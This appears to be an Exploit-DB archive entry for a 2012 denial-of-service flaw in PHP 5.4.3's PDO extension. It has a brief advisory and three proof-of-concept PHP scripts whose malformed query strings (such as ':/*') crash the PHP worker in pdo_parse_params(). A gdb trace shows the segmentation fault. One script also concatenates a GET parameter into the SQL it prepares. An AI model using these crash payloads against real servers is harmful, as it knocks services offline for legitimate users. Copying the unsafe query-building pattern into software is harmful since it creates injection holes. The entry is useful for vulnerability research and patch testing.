PHP 5.4.3 - PDO Memory Access Violation Denial of Service

EDB-ID:

37566


Author:

0x721427D8

Type:

dos


Platform:

PHP

Date:

2012-08-02


source: https://www.securityfocus.com/bid/54777/info

PHP is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to cause the web server to crash, denying service to legitimate users.

PHP 5.4.3 is vulnerable; other versions may also be affected. 

<?php
 try {
 $db = new PDO('mysql:host=localhost;dbname=aws', "root", "");
 //tokens: 
 // SELECT;*;from;'user';/*
 //$sql = "SELECT * from 'user'/*";
 $stmt = $db->prepare("SELECT * from 'user'".mysql_real_escape_string($_GET['query']));
 $stmt->execute();
 //crash
 $stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);
 $stmt->fetch(PDO::FETCH_BOUND);
 print_r( $type);
 }
 catch (Exception $e)
 {
 echo "Failed: " . $e->getMessage();
 }
 ?>
 -----
 <?php
try {
$db = new PDO('mysql:host=localhost;dbname=aws', "root", "");

//tokens:
// SELECT;*;from;'user';/* 
$sql = ":/*";

$stmt = $db->prepare($sql);
$stmt->execute();     // crashes php worker in pdo_parse_params()

$stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);
$stmt->fetch(PDO::FETCH_BOUND);
print_r( $type);

} catch (Exception $e) {
  echo "Failed: " . $e->getMessage();
}

?>
---

<pre>
<?php
echo "hmm beginning\n";
try {
$db = new PDO('mysql:host=localhost;dbname=aws', "root", "");
echo "lets get it on\n";
//tokens:
// SELECT;*;from;'user';/* 
$sql = "SELECT * from user :/**";
echo $sql;
$stmt = $db->prepare($sql);
echo "prepared :)\n";
print_r($stmt);
$stmt->execute();     // crashes php worker in pdo_parse_params()
print_r($stmt);
echo "executed :(\n";
$stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);
$stmt->fetch(PDO::FETCH_BOUND);
echo "--data-\n";
print_r( $type);
echo "--data--\n";

} catch (Exception $e) {
        echo "EXCEPTION";
  echo "Failed: " . $e->getMessage();
}
echo "hmmm end\n";
?>
</pre>

Actual result:
--------------
root@bt:/opt/lampp# gdb ./bin/php 
(gdb) run poc_pdo_linux_short_1.php
Starting program: /opt/lampp/bin/php /opt/lampp/poc_pdo_linux_short_1.php
[Thread debugging using libthread_db enabled]

Program received signal SIGSEGV, Segmentation fault.
0x08228a81 in ?? ()
(gdb) bt
#0  0x08228a81 in ?? ()
#1  0x082280eb in pdo_parse_params ()
#2  0x08223891 in ?? ()
#3  0x084b2aad in ?? ()
#4  0x084b1f87 in execute ()
#5  0x08490ed2 in zend_execute_scripts ()
#6  0x0843f13c in php_execute_script ()
#7  0x08506b46 in main ()